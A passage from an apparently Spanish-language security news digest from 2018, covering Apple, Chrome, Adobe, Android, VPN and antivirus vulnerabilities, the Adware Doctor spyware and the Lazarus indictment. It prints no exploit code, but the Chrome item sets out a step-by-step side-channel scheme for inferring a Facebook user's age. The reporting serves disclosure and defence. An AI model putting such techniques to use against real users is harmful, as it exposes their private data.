  • Impacto: El borrado de elementos del historial de navegación no es completo
  • Solución: Mejora en el borrado de elementos, que contempla redirecciones

• CVE-2018-4307
  • Módulo: Safari
  • Impacto: Una web maliciosa puede extraer información del autocompletado
  • Solución: Mejora en la gestión de estados lógicos

• CVE-2018-4362
  • Módulo: SafariViewController
  • Impacto: Una web maliciosa puede modificar el contenido de la barra de direcciones
  • Solución: Mejora en en la gestión de estados de la interfaz de usuario

• CVE-2016-1777
  • Módulo: Security
  • Impacto: Un atacante puede explotar debilidades del algoritmo criptográfico RC4
  • Solución: Eliminación del algoritmo RC4

• CVE-2016-4325
  • Módulo: Status Bar
  • Impacto: Una persona con acceso físico al dispositivo puede determinar la última aplicación usada con la pantalla bloqueada
  • Solución: Mejora de restricciones

• CVE-2018-4338
  • Módulo: Wi-Fi
  • Impacto: Una aplicación puede leer memoria restringida
  • Solución: Mejora del saneamiento de entradas.

Todas las vulnerabilidades han sido corregidas por Apple en la última versión disponible de iOS 12.
Más información:

 

Apple security update – HT209106
https://support.apple.com/en-us/HT209106

Exploit basado en CSS puede bloquear tus dispositivos Apple

Se ha revelado la PoC que únicamente contiene unas pocas líneas de código CSS y HTML.

Sabri Haddouche es el nombre del investigador que ha descubierto este fallo. La prueba de concepto liberada fue colgada en Twitter y en su Github. Más allá de un simple bloqueo, la página web, si se visita, provoca un pánico en el kernel del dispositivo y un reinicio completo del sistema. 

Explicación del fallo:

El exploit aprovecha una debilidad en el motor de renderizado de Apple Webkit, que es utilizado por todas las aplicaciones y navegadores de la conocia marca. Dado que Webkit no cargaba correctamente varios elementos como etiquetas <div> dentro de una propiedad del filtro CSS, el investigador creó una web que utiliza todos los recursos del dispositivo, provocando el apagado y reinicio del mismo. 

Prueba de concepto:

Todos los navegadores que corren sobre iOS son vulnerables a este ataque. Por otro lado, los usuarios de Windows y Linux no se ven afectados por esta vulnerabilidad.

De momento no hay parche disponible contra este fallo, pero se presupone que Apple está investigando el problema.

Más información:

 

Código de la PoC:
https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea

 

Corrupción de la memoria del kernel a través de Webroot SecureAnywhere

Un fallo en el software antivirus SecureAnywhere de Webroot permitiría a un usuario sin privilegios leer o escribir una dirección de memoria arbitraria.

El pasado 13 de septiembre, investigadores de Trustwave han descubierto una vulnerabilidad de corrupción de memoria en la versión de macOS de SecureAnywhere, el software antivirus desarrollado por la empresa Webroot.

La ausencia de control de acceso en uno de los procesos que se comunican con el driver del kernel de Webroot SecureAnywhere, permitirían la desreferencia de un puntero controlado por un usuario (sin privilegios) para leer y escribir en una dirección arbitraria.

La vulnerabilidad ha sido corregida en la versión 9.0.8.34 de SecureAnywhere.

 

Más información:

 

CVE-2018-16962: Webroot SecureAnywhere macOS Kernel Level Memory Corruption
https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2018-16962–Webroot-SecureAnywhere-macOS-Kernel-Level-Memory-Corruption/Mac Version 9.0.8.34 (Released July 24th, 2018)
http://answers.webroot.com/Webroot/ukp.aspx?pid=10&app=vw&vw=1&login=1&json=1&solutionid=2022

Los ataques ‘Cold Boot’ vuelven una década después

Aunque el ataque ‘Cold Boot’ no es nuevo y parecía estar subsanado, los investigadores de seguridad Olle Segerdah y Pasi Saarinen, de F-Secure, aseguran haber conseguido realizar el ataque a varios ordenadores de forma exitosa aprovechando una vulnerabilidad en la forma en las que los ordenadores protegen el firmware, existente en la mayoría de los ordenadores de la actualidad.

Extraída de https://thehackernews.com

El ataque ‘Cold Boot’ o de ‘Inicio en frío’ es un ataque que se descubrió hace una década y que permitiría a un atacante con acceso físico a una máquina robar claves de cifrado entre otra información sensible. Este ataque consistía en reiniciar el ordenador sin en proceso adecuado de apagado, lo que podría permitir recuperar los datos existentes en la memoria RAM antes de que sean eliminados.

Pasos de realización del ataque, extraída de https://blog.f-secure.com

El problema fue subsanado aplicando un proceso de sobreescritura a los datos existentes en la memoria, impidiendo que la información pudiera ser robada. Ahora los investigadores de seguridad aseguran haber descubierto una manera de deshabilitar este proceso, lo que les permitiría realizar un ataque ‘Cood Boot’ al sistema.

Los investigadores también alertan de que este error existe en la mayoría de los ordenadores de hoy en día y aunque los ataque son en frío, no son fáciles de llevar a cabo. Los atacantes deben disponer de tiempo y formas consistentes y confiables para comprometer los equipos objetivos, ya que hay que tener acceso físico a ordenador en cuestión y herramientas adecuadas.

“It’s not exactly easy to do, but it’s not a hard enough issue to find and exploit for us to ignore the probability that some attackers have already figured this out,” says Olle. “It’s not exactly the kind of thing that attackers looking for easy targets will use. But it is the kind of thing that attackers looking for bigger phish, like a bank or large enterprise, will know how to use.”

Los investigadores aseguran que el error no tiene fácil solución y que cada fabricante tendrá que lidiar con el problema. Aún así, Microsoft y Apple están trabajando en una solución conjunta.

Aunque ahora mismo no existe ningún parche oficial, los de Redmon han actualizado sus contramedidas con BitLocker. Por su parte, los de la manzana, han actualizado sus recomendaciones de seguridad, en especial para aquellas personas cuyo ordenador no posea un chip T2, el cual supuestamente ya está protegido frente a este ataque.

El error ha sido presentado en la conferencia SEC-T en Suecia, y el próximo día 27, volverán a hacer una presentación en la conferencia de Microsoft BlueHat v18.

Actualmente los errores han sido reportados a Microsoft y a Apple con los que colaboran para una correcta solución.

Más información:

The Chilling Reality of Cold Boot Attacks:
https://blog.f-secure.com/cold-boot-attacks/New Cold Boot Attack Unlocks Disk Encryption On Nearly All Modern PCs
https://thehackernews.com/2018/09/cold-boot-attack-encryption.htmlLest We Remember: Cold Boot Attacks on Encryption Keys
https://www.usenix.org/legacy/event/sec08/tech/full_papers/halderman/halderman.pdf

[VIDEO] SEC-T 0x0Beyond – Conference day 1
https://www.youtube.com/watch?v=ISE3pxAj7yk

Vulnerabilidad de falsificación de sitios web descubierta en Safari

Se ha descubierto una vulnerabilidad que podría permitir a los atacantes falsificar direcciones de sitios web legítimos para robar credenciales

Si bien Microsoft solucionó el mes pasado esta misma vulnerabilidad que le afectaba en su navegador Edge, Safari aún no está parcheado.

El fallo ha sido descubierto por el investigador de seguridad Rafay Baloch. La vulnerabilidad (CVE-2018-8383) se debe a un problema de condición de carrera que permite a JavaScript actualizar la dirección de la página web en la URL mientras se carga la página. 

Funcionamiento de la vulnerabilidad

La explotación de esta vulnerabilidad podría permitir que un atacante inicialmente comience a cargar una página legítima y luego reemplazar el código en la web por uno malicioso.

«Al solicitar datos de un puerto inexistente, la dirección se conservó y, por lo tanto, debido a una condición de carrera sobre un recurso solicitado desde un puerto inexistente combinado con el retraso introducido por la función setInterval logró activar la suplantación de barra de direcciones», explica Baloch en su blog.

Prueba de concepto

Los desarrolladores de Microsoft arreglaron el fallo antes de que pasara la fecha límite de 90 días desde que se le informó, pero Apple aún no ha puesto solución al error.

Baloch sigue sin exponer el código de la prueba de concepto de este último, pero dado que el de Microsoft Edge es público y el fallo es muy similar, cualquier persona con un conocimiento decente de JavaScript podría hacerlo funcionar en Safari.

El propio investigador asegura que este fallo no afecta ni a Chrome ni a Firefox.

Más información:

Blog de Rafay Baloch:

https://www.rafaybaloch.com/2018/09/apple-safari-microsoft-edge-browser.html

Explicando WPA3: más seguridad y más fácil de usar

Esta nueva versión incluye el nuevo protocolo SAE, que hará inviable nuevos ataques como KRACK; aunque también se incluyen mejoras para hacer más fácil y seguro compartir redes y usar redes públicas

Durante más de una década, el uso de PSK (clave pre-compartida, comúnmente conocido como ‘four-way handshake’) se ha considerado seguro, hasta que en 2016 un grupo de investigadores belgas descubrieron lo que se denominaría KRACK, dejando de manifiesto la necesidad de buscar una alternativa: SAE (Simultaneous Authentication of Equals).

Este nuevo protocolo empleado por WPA3 (que en realidad data de 2008), se trata de una variación de dragonfly handshake, contando entre sus novedades resistencia a ataques como el de KRACK, pero además hace inútil los ataques por diccionario a los paquetes interceptados. Por si fuese poco, además cuenta con ‘forward secrecy’. Esto significa, que aunque se obtenga la clave, un atacante no podrá descifrar los mensajes anteriormente cifrados con dicha clave, porque ésta cambia con cada comunicación.

SAE a diferencia de PSK, tal y como indica su nombre (Simultaneous Authentication of Equals) trata a cada cada parte como iguales, y cualquiera de ellas puede establecer la comunicación. Este nuevo método se contrapone a la forma de trabajar de PSK, en que router y cliente se encontraban diferenciados, y era posible forzar la desconexión entre ambos para analizar los ‘handshake’ (tal y como hace KRACK).

Además de SAE, WPA3 en su modalidad WPA3-Enterprise contará con cifrado de 192-bits, al contrario que WPA3-Personal, que utilizará 128-bits. Esta seguridad adicional puede ser excesiva para el mercado doméstico, pero su uso puede ser requerido por instituciones y gobiernos.

WPA3 no es sólo más seguro, sino también más fácil de usar. Muestra de ello es Easy Connect, un nuevo protocolo que ha sido creado para facilitar compartir (y seguro) el acceso a una red. Esta nueva modalidad hace uso de códigos QR únicos, que deben ser escaneados por los dispositivos. Para aquellos dispositivos sin posibilidad de escanear el código QR, también será posible utilizar un código legible por un ser humano, e incluso compartirlo mediante sonido. Este tipo de medidas evitan compartir la contraseña (lo cual es más inseguro) y reduce los errores comunes al almacenar la clave para compartirla (a.k.a apuntarlo en un post-it). Sólo esperemos que estas nuevas facilidades, no se conviertan en un agujero de seguridad, como ya ocurrió con WPS.

Relacionado con lo anterior, el nuevo protocolo Enhanced Open protegerá a los usuarios que se conecten a redes abiertas, como aeropuertos o cafés, de ver sus datos comprometidos por el resto de usuarios de la red. Éste es un problema grave existente hasta ahora del que muchos usuarios no son conscientes, siendo la única solución utilizar una VPN (algo, que la mayoría de personas no utilizarán). Aunque el uso de una VPN en una red desconocida seguirá siendo aconsejable (porque no sabemos quien controla la red), este nuevo protocolo protegerá en gran medida a los usuarios que no usen una VPN.

Más información:

Wi-Fi Gets More Secure: Everything You Need to Know About WPA3

https://spectrum.ieee.org/tech-talk/telecom/security/everything-you-need-to-know-about-wpa3

SAE
https://ieeexplore.ieee.org/document/4622764/

RFC Dragonfly Key Exchange
https://tools.ietf.org/html/rfc7664

Wi-Fi Easy Connect
https://www.wi-fi.org/discover-wi-fi/wi-fi-easy-connectOpen Wi-Fi networks
https://www.wi-fi.org/discover-wi-fi/security

Descubierta aplicación anti-adware espiando a los usuarios de Mac

Se trata de la aplicación «Adware Doctor», esta aplicación está diseñada para proteger a sus usuarios de adware y malware e irónicamente ha sido descubierta robando el historial de navegación de los usuarios sin su consentimiento y enviándolo a servidores localizados en China.

El investigador de seguridad ‘@privacyis1st’ detectó un comportamiento sospechoso de spyware en la aplicación antes citada y le reportó los resultados de la investigación a Apple junto con la prueba de concepto de este incidente, pero la aplicación seguía siendo hospedada por el famoso market.

Una investigación más exhaustiva de la aplicación desveló que elude el entorno de ‘Sandboxing’ presente en la ejecución de cada aplicación dentro del sistema operativo del gigante tecnológico. Lo cual conlleva a una violación de los acuerdos de desarrollo de aplicaciones.

Los datos obtenidos por la aplicación son principalmente todos los sitios web que el usuario haya visitado por los navegadores más famosos (Google Chrome, Firefox, Safari) y los envía a servidores chinos (hxxp://yelabapp.com) que está a cargo de los creadores de la aplicación. La aplicación se salta la protección de sandboxing y accede a estos datos, comprimiéndolos para posteriormente mandarlos al servidor a través de ‘sendPostRequestWithSuffix’.

Esta aplicación tiene más historia detrás antes podíamos encontrarla con el nombre de ‘Adware Medic’, que era una aplicación que simulaba ser otra llamada AdwareMedic. Se marcó como falsa con la ayuda de MalwareBytes y se eliminó de la AppStore, pero luego apareció Adware Doctor y se convirtió en la mejor aplicación de pago de la AppStore.

Dado que la aplicación viola flagrantemente los términos y condiciones del market de aplicaciones recopilando datos de los usuarios sin su consentimiento y saltándose las protecciones de sandboxing presentes se le comunicó a Apple el incidente, esta comunicación se lleva a cabo hace algunas semanas, pero la compañía aún no ha hecho nada al respecto.

Fue después cuando la información se hizo pública cuando Apple tomó cartas en el asunto y la aplicación fue finalmente borrada junto con la otra aplicación presente del mismo desarrollador ‘AdBlock Master’ y la URL donde se enviaban los datos ha dejado de ser accesible.

Se recomienda a los usuarios que hayan instalado esta aplicación que la borren inmediatamente de sus dispositivos.

 

Más información:

Fuente:
https://thehackernews.com/2018/09/mac-adware-removal-tool.html

Artículo técnico:

https://objective-see.com/blog/blog_0x37.html

Escalada de privilegios en ProtonVPN Client

Recientemente se ha descubierto una vulnerabilidad que afecta a la versión 1.5.1 del cliente ProtonVPN

ProtonVPN es un servicio ofrecido por la compañía Proton Technologies, esta compañía es famosa por un servicio de email llamado «ProtonMail» uno de los servicios de correos más seguros del momento.

Hace poco la empresa apostó por hacer un servicio VPN usando la misma visión que con el servicio de email. Y han empezado a aparecer ya algunas vulnerabilidades del lado del cliente.

El cliente de ProtonVPN se divide en dos partes, por un lado está la ‘GUI (Interfaz gráfica)’que se ejecuta con privilegios estándar y el propio servicio que corre con los privilegios del sistema.

Esta vulnerabilidad fue reportada por el equipo en julio y el parche ha llegado en una actualización del 3 de septiembre. Se recomienda actualizar los  clientes a la versión actual.

Fuente:

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0679

Código fuente:
https://github.com/OpenVPN/openvpn/blob/5961250e776194a411a8dfc1670c5c0c73107bf8/src/openvpn/options.c

Acusado un espía de Corea del Norte por el ataque a Sony Pictures y el gusano WannaCry 2.0

El Departamento de Justicia estadounidense ha acusado a Park Jin-hyok, un espía de la República Popular de Corea del Norte, de estar detrás de una serie de ataques internacionales de gran repercusión

Buscado por el FBI. Este ciudadano de Corea del Norte es acusado de pertenecer al grupo de delincuentes informáticos conocido como Lazarus. Este grupo presuntamente patrocinado por el gobierno de Corea del Norte lleva en activo desde 2009 atacando toda clase de objetivos. Varios de estos ataques tuvieron objetivos de Corea del Sur, así como los conocidos ataques a Sony Pictures Entertainment y el gusano WannaCry 2.0.

Diagrama que vincula al acusado con las víctimas mediante cuentas de correo usadas en los ataques

La denuncia original, a pesar de estar en inglés y ser un documento legal, es sorprendentemente legible, y se encuentra en el siguiente enlace:

https://int.nyt.com/data/documenthelper/274-park-jin-hyo-complaint/7b40e5ed5b185f141e1a/optimized/full.pdf

En ella, el agente especial del FBI Nathan P. Shields, cuya experiencia profesional incluye ingeniería de software en la NASA además de 7 años como agente especial, explica en 179 páginas los detalles de cómo el acusado participó en los hechos. Concretamente, los delitos de los que se le acusa son conspiración y conspiración para cometer fraude electrónico, ambos delitos tipificados en el Título 18 del Código de los Estados Unidos, reservado a los crímenes perseguidos por el gobierno federal (por contraposición a los perseguidos por un estado concreto) y al enjuiciamiento criminal.

Desde el punto de vista de la seguridad informática, es interesante leer la denuncia por lo detallado de la investigación. Se llega hasta el punto de explicar técnicamente que cierto malware está relacionado con otro por contener ambos cierta sección de código binario o usar el mismo protocolo falso para comunicarse con los servidores de control (de esta forma, relacionan diferentes ataques con este grupo). Este protocolo falso parece TLS(un protocolo estándar usado para comunicaciones cifradas), pero no lo es, ya que utiliza otro tipo de cifrado, entre otras diferencias. El objetivo de realizar algo así es evadir los sistemas de detección de intrusos, que lo ven como tráfico legítimo cifrado y no lo detectan como malicioso.

Volviendo al tema del acusado, la última información que se tiene de él es que volvió a Corea del Norte después de trabajar en China para una empresa vinculada con el gobierno coreano. Como es de esperar, no existe convenio de extradición entre Corea del Norte y Estados Unidos. Como diría el famoso futbolista y entrenador Bernd Schuster, «no hase falta desir nada más».

 

U.S. Ties Lazarus to North Korea and Major Hacking Conspiracy
https://threatpost.com/u-s-ties-lazarus-to-north-korea-and-major-hacking-conspiracy/137264/

FBI Most Wanted: PARK JIN HYOK
https://www.fbi.gov/wanted/cyber/park-jin-hyok

A Look into the Lazarus Group’s Operations
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/a-look-into-the-lazarus-groups-operations

Actualización de seguridad para Google Chrome

Google anuncia una nueva versión de su navegador Google Chrome 69. Se publica la versión 69.0.3497.81 para las plataformas Windows, Mac y Linux, que incluye algunas mejoras y soluciona 40 vulnerabilidades.

Backswap ataca ahora a la banca española

Nueva versión de Backswap ataca ahora a seis entidades bancarias españolas.

Actualizaciones para múltiples productos de Adobe

Adobe ha publicado cuatro boletines de seguridad en los que se hah corregido un total de once vulnerabilidades en sus productos Flash Player, Reader, Acrobat, Experience Manager, y Creative Cloud Desktop Application

A continuación se exponen los boletines publicados para cada producto.

Adobe Creative Cloud Desktop Application (APSB18-20): boletín que soluciona una vulnerabilidad relacionada con la carga insegura de librerías DLL que podría permitir la elevación de privilegios (CVE-2018-5003).

Adobe Flash Player (APSB18-25): solventa cinco errores de seguridad en el popular reproductor flash que podrían causar la revelación de información (CVE-2018-12824, CVE-2018-12826, CVE-2018-12827), eludir restricciones de seguridad (CVE-2018-12825), y elevar privilegios (CVE-2018-12828).

Adobe Experience Manager (APSB18-26): tres problemas de seguridad son solucionados en este boletín que podrían permitir la revelación de información sensible a través de ataques Cross-site Scripting y Cross-site Scripting reflejado (CVE-2018-5005 y CVE-2018-12806) y modificar información sin autorización a causa de un error relacionado con el incorrecto filtrado de entradas proporcionadas por el usuarios (CVE-2018-12807).

Adobe Reader y Acrobat (APSB18-29): este último boletín corrige dos vulnerabilidades que permitirían la ejecución de código remoto debido a una escritura en memoria fuera de límite y dereferencia a puntero (CVE-2018-12808 y CVE-2018-12809 respectivamente).

Se encuentran afectadas las siguientes versiones de los producto Adobe (y anteriores):

• Adobe Creative Cloud Desktop Application 4.5.0.324 para Windows
• Adobe Flash Player 30.0.0.134 para los sistemas operativos Windows, macOS, Linux y ChromeOS, así como los navegadores Google Chrome, Microsoft Edge and Internet Explorer 11.
• Adobe Experience Manager 6.x para todas las plataformas.
• Acrobat en sus versiones 2018.011.20055, 2017.011.30096 y 2015.006.30434, y anteriores para Windows y macOS.
• Acrobat Reader en sus versiones 2018.011.20055, 2017.011.30096 y 2015.006.30434 para Windows y macOS.

 

Más información:

 

APSB18-20 – Security update available for the Adobe Creative Cloud Desktop Application:

https://helpx.adobe.com/security/products/creative-cloud/apsb18-20.html

APSB18-25 – Security updates available for Adobe Flash Player:

https://helpx.adobe.com/security/products/flash-player/apsb18-25.html

APSB18-26 – Security update available for Adobe Experience Manager:

https://helpx.adobe.com/security/products/experience-manager/apsb18-26.html

APSB18-29 – Security updates available for Adobe Acrobat and Reader:

https://helpx.adobe.com/security/products/acrobat/apsb18-29.html

Adobe Creative Cloud Desktop Application:

https://www.adobe.com/in/creativecloud/catalog/desktop.html

Adobe Flash Player:

http://get.adobe.com/flashplayer/

Adobe Reader:

https://get.adobe.com/reader/

Actualización de seguridad para Apache Struts

Apache ha confirmado una vulnerabilidad en el proyecto Apache Struts que podría permitir a un atacante remoto ejecutar código arbitrario.

El ransomware SamSam ataca a entidades financieras peruanas

Desde Hispasec tenemos conocimiento de los ataques sufridos por entidades financieras peruanas, ataques que han tenido como objetivo principal la instalación del ransomware SamSam (también conocido como Samsa o Samas)

Un fallo en Google Chrome permite extraer información sensible de otras páginas

La implementación de la política del mismo origen en las etiquetas HTML multimedia es insuficiente, lo que permite peticionar páginas externas de las que es posible extraer cierta información

Extraer información de tu perfil personal de Facebook si tienes iniciada sesión en él y visitas una web maliciosa. Esta es la prueba de concepto llamativa para esta vulnerabilidad. Es posible extraer tu edad, tus likes, tu histórico de localización…Esta vulnerabilidad ha sido reportada por Imperva, una empresa de seguridad informática dedicada entre otras cosas al análisis de eventos de seguridad. Se dieron cuenta de ella cuando investigaban el comportamiento del mecanismo CORS (Cross-Origin Resource Sharing) en las distintas etiquetas HTML.

Lo que encontraron fue ciertamente interesante… Pero antes es necesario explicar lo básico, para que la vulnerabilidad no nos suene a chino. Primero, es necesario saber que el navegador, por seguridad, restringe bastante las peticiones que puede hacer una página web a otra página web que no esté en su dominio. ¿Qué quiere decir esto? Que la página de facebook.com tal y como se ejecuta en tu navegador, no puede hacer cierto tipo de peticiones a google.com. ¿Por qué este comportamiento? Un ejemplo simple: imagínate que entras a paginamala.com y ésta se pone a hacer peticiones a bancosantander.com, teniendo abierta la banca online… En realidad luego no es tan sencillo, ya que existe otra serie de medidas para evitar que esto ocurra aunque no se respete esa restricción, pero es un control necesario más.

Lo que acabamos de contar arriba no es ni más ni menos que la famosa «same-origin policy» (política del mismo origen), cuyo nombre tras la breve explicación cobra sentido. Lo que pasa es que la web, por definición, no tiene sentido como nodos aislados, y una página funcional necesita recursos de otras webs. No estamos hablando de estar en google.com y desde allí pinchar en un enlace a facebook.com, no. Esto se considera como una acción intencionada del usuario, y no es la misma página la que ejecuta la acción (ni recibe el contenido de facebook.com). Hablamos de facebook.com necesitando una fuente de texto especial alojada en google.com (que tiene una sección para obtener fuentes), para poder mostrarte un texto con esa fuente.

Error en Chrome por realizar una petición que viola la política del mismo origen

Es por esto que para que una web pueda acceder a recursos de otra (siempre que esta otra quiera), se crea el mecanismo CORS antes mencionado, que define una serie de situaciones y acciones que se deben llevar a cabo en éstas que permiten compartir recursos entre orígenes distintos. Y esto es lo que significa CORSbásicamente, «intercambio de recursos de origen cruzado». En la práctica esto se implementa haciendo el navegador una petición de prueba antes de la real, para preguntar al dominio externo si permite peticiones completas desde otros dominios, y si no lo permite explícitamente, no se hace la petición completa. En algunos casos más relajados se permite hacer directamente la petición completa, pero si el servidor no especifica explícitamente que cierta página externa puede peticionarla (ya sea por no haber sido configurado o por otras razones), el mismo navegador no permite a la página leer la respuesta a la petición.

Ya disponemos de las bases para entender la vulnerabilidad. Como bien sabemos, la parte principal de una web está compuesta por HTML, que a su vez se compone de etiquetas especificando el contenido de la web. Pues bien, en Google Chrome, las etiquetas ‘audio’ y ‘video’, tienen un pequeño fallo. Estas etiquetas son usadas para insertar audio y vídeo en las páginas, y uno de sus atributos es la URL en la que está el recurso, (audio o vídeo). El fallo que tienen es que no comprueban el tipo de recurso (básicamente, que sea audio o vídeo) antes de permitir acceder a cierta información del recurso. Concretamente, sin saber si el recurso es audio o vídeo y mientras lo descarga, esta etiqueta lanza una serie de eventos que el código JavaScript de la página puede capturar y extraer información de éstos.

¿Cuál es el problema de ésto? Que según el número de eventos de cierto tipo que arroje la etiqueta HTML mientras va cargando el recurso sea audio o no, es posible estimar el tamaño del recurso. ¿Realmente esto es un problema? Sí. Y lo entenderemos describiendo el escenario del ataque propuesto por el autor:

1. Crea una página en Facebook
2. Publica un post restringido a personas con 18 años
3. Publica otro post restringido a persona con 19 años
4. Publica más posts con la misma idea hasta cubrir todo el rango de edad, año a año
5. Crea una página maliciosa con tantas etiquetas ‘audio’ como posts has creado en Facebook, y que cada una apunte a un post.
6. Controla la cantidad de veces que se lanza este evento por cada etiqueta, para estimar el tamaño de cada página.
7. Consigue que la víctima visite tu página maliciosa

La idea de esto es que el post restringido a la edad que tiene el usuario tendrá un tamaño distinto al resto de páginas, que serán más pequeñas porque en vez del ofrecer el contenido del post, devolverán un mensaje del estilo «no estás autorizado a ver este post». El autor describía esto como jugar a un juego de preguntas de sí o no para adivinar algo, al estilo de Quién es Quién. Este escenario en concreto quizás no se pueda reproducir ahora mismo, ya que Facebook ha cambiado hace poco el sistema de restricción y parece que no se puede restringir por edad a nivel de año, sino por rangos concretos. Igualmente, el autor describe otros campos que se pueden extraer y no sólo es posible con Facebook, sino con cualquier web en realidad que tenga características similares.

Afortunadamente, este fallo (CVE-2018-6177) se reportó por las vías adecuadas (a Google de forma privada) y actualmente se encuentra corregido en la versión estable 68. ¿Cómo lo ha corregido Google? Ahora no permite que se dispare ese evento hasta que el navegador no sepa a ciencia cierta que lo que está cargando es un recursos de audio o vídeo. Esta vulnerabilidad es compleja, aunque comparada con el resto de vulnerabilidades que se suelen encontrar hoy en día tampoco es extraordinaria. Eso permite hacerse una idea de la cantidad de conocimiento que es necesario tener sobre un sistema para encontrar una vulnerabilidad medio graveen éste, sobre todo si es el navegador más usado en todo el mundo.

Más información:

 

A Bug in Chrome Gives Bad Actors License to Play ‘20 Questions’ with Your Private Data
https://www.imperva.com/blog/2018/08/a-bug-in-chrome-gives-bad-actors-license-to-play-20-questions-with-your-private-data/Stable Channel Update for Desktop – Tuesday, July 24, 2018
https://chromereleases.googleblog.com/2018/07/stable-channel-update-for-desktop.html

Control de acceso HTTP (CORS)
https://developer.mozilla.org/es/docs/Web/HTTP/Access_control_CORS

Política Same-origin

https://developer.mozilla.org/es/docs/Web/Security/Same-origin_politica

Security: Cross Site Resource Size Estimation via OnProgress events

https://bugs.chromium.org/p/chromium/issues/detail?id=826187

defeat cors attacks on audio/video tags

https://chromium.googlesource.com/chromium/src.git/+/4504a474c069d07104237d0c03bfce7b29a42de6

Vulnerabilidad crítica en Oracle Database

El fallo, con una puntuación CVSSv3 de 9,9, podría propiciar el acceso completo a la base de datos y al sistema operativo subyacente. Oracle apela al parcheo inmediato de los sistemas.

Man-in-the-Disk: el nuevo ataque que ha dejado a millones de teléfonos Android vulnerables

El ataque aprovecha la forma en la que las apps utilizan el sistema de almacenamiento externo para dar como resultado una inyección de código.

Los investigadores de seguridad de Check Point Software Technologies han descubierto un nuevo vector de ataque contra el sistema operativo Android que podría permitir a los atacantes infectar silenciosamente sus teléfonos inteligentes con aplicaciones maliciosas o lanzar ataques de denegación de servicio.

Conceptos base:

Es bien conocido que las aplicaciones en el sistema operativo Android pueden almacenar sus recursos en el dispositivo en dos ubicaciones: almacenamiento interno y externo.

Google, insta a los desarrolladores a usar el almacenamiento interno, que es un espacio aislado asignado a cada aplicación protegida usando el ‘sandbox’ integrado de Android, para almacenar sus archivos o datos confidenciales.

Sin embargo, los investigadores encontraron que muchas aplicaciones usaban almacenamiento externo sin protección al que cualquier aplicación instalada en el mismo dispositivo puede acceder.

Explicación del ataque:

Por ejemplo, los investigadores encontraron que el navegador web Xiaomi descarga su última versión en el almacenamiento externo del dispositivo antes de instalar la actualización. Dado que la aplicación no puede validar la integridad de los datos, el código de la actualización legítimo de la aplicación se puede reemplazar por uno malicioso.

 
Entre las aplicaciones que han probado se encuentran: Google Translate, Yandex Translate, Google Voice Typing, Lg World, … entre otras.

Los investigadores recalcan que solo han probado una pequeña cantidad de aplicaciones importantes y, por lo tanto, esperan que el problema afecte a un número más signifitcativo.

 

Más información:

 

Post de Check Point:

https://blog.checkpoint.com/2018/08/12/man-in-the-disk-a-new-attack-surface-for-android-apps/

El cifrado Speck gana presencia en el kernel Linux

Speck es un algoritmo de cifrado ligero, especialmente diseñado para dispositivos IoT, con baja capacidad de cómputo y creado por la NSA, la Agencia de Seguridad Nacional de Estados Unidos.

Esta tecnología, que fue aceptada por una petición de Google para dar soporte de cifrado al nuevo sistema operativo Android Go en la versión 4.17 del kernel Linux, ha aumentado su presencia en el kernel de Linux debido a la inclusión de Speck128 y Speck256 como algoritmos compatibles en FSCRYPT.

Speck al igual que Simon, fueron publicadas en 2013 como dos tipos cifrados diseñados para sistemas ligeros. Speck es un cifrado add-rotate-xor (ARX) diseñado para ser lo más ligero posible, mientras que su algoritmo hermano, Simon, se ha optimizado para implementaciones de hardware.

 

El hecho de que ambas tecnologías de cifrado hayan sido desarrolladas por la NSA y que hayan sido rechazadas por la Organización Internacional de Estándares (ISO), han rodeado a esta decisión de una latente desconfianza por parte de la comunidad.

Si tiramos de antecedentes, esta desconfianza está sustentada por hechos como las filtraciones sobre que el software de cifrado Truecrypt estaba ‘backdoreado’ por la NSA. Caso que finalmente por medio de dos auditorias quedó descartado, excepto por los más escépticos que vieron en el abandono de sus desarrolladores un argumento a favor de sus convicciones.

Más información:

EXT4/Fscrypt Changes For Linux 4.18:
https://www.phoronix.com/scan.php?page=news_item&px=EXT4-Fscrypt-Speck-Crypto-4.18

ISO reject:
https://www.theregister.co.uk/2018/04/25/nsa_iot_encryption/

Auditoría Truecrypt:

https://www.pcworld.com/article/2905995/truecrypt-audit-shows-no-sign-of-nsa-backdoors-just-some-minor-glitches.html

Kaspersky VPN – Descubierto bug que afecta a millones de usuarios

La versión 1.4.0.216 de Kaspersky VPN presenta una fuga de DNS que podría revelar información sobre las páginas visitadas por los usuarios.

El bug se encontraba en el servicio VPN ofrecido por Kaspersky, también conocido como «Secure Connection» y que según Kaspersky cuenta con más de un millón de usuarios en todo el mundo.

En Android, Kaspersky VPN – Secure Connection tiene más de 1.000.000 de descargas

Cuando un usuario se conecta a una VPN, todo el tráfico pasa a través de un túnel cifrado al servidor VPN, por lo que al servidor de destino le llega la dirección IP de dicho servidor.

Funcionamiento VPN

El problema surge cuando Kaspersky VPN no redirige las consultas al servidor DNS cifradas, por lo que el servidor DNS podría registrar los sitios web que visitan los usuarios e incluso vincularlos a su dirección IP.

Este bug fue descubierto por el analista de seguridad Dhiraj Mishra, en su blog indica los pasos a seguir para reproducir el problema:

1. Visitar IPleak.net
2. Conectarse a cualquier servidor virtual utilizando Kaspersky VPN.
3. Una vez conectado, volver a visitar IPleak.net. Se podrá observar que la dirección DNS no ha cambiado.

 

Kaspersky a solucionado este fallo en la versión 1.4.0.453. Se recomienda actualizar a la última versión disponible.

Más información:

 

A bug that affects million users – Kaspersky VPN | Dhiraj Mishra
https://www.inputzero.io/2018/08/kaspersky-vpn-leaks-dns-address.html

Actualización de seguridad para VMware Horizon Client

El equipo de VMware a publicado actualizaciones de seguridad para corregir una vulnerabilidad de lectura fuera de límites de memoria (Out-of-bounds Read) que afecta al producto VMware Horizon Client para Windows.

VMware Horizon ofrece una infraestructura de escritorios virtuales (VDI). Es este caso el cliente de conexión de Horizon permite a los usuarios conectarse a su escritorio virtual desde múltiples dispositivos.

La aplicación Horizon Client se comunica con View Connection Server, que actúa como intermediario entre el dispositivo cliente y los escritorios. Los usuarios inician sesión en Horizon Client y View Connection Server los autentica para luego conectarlos con sus respectivos escritorios virtuales.

VMware Horizon – Gestión de la infraestructura

VMware Horizon Client – Conexión desde el cliente al escritorio virtual

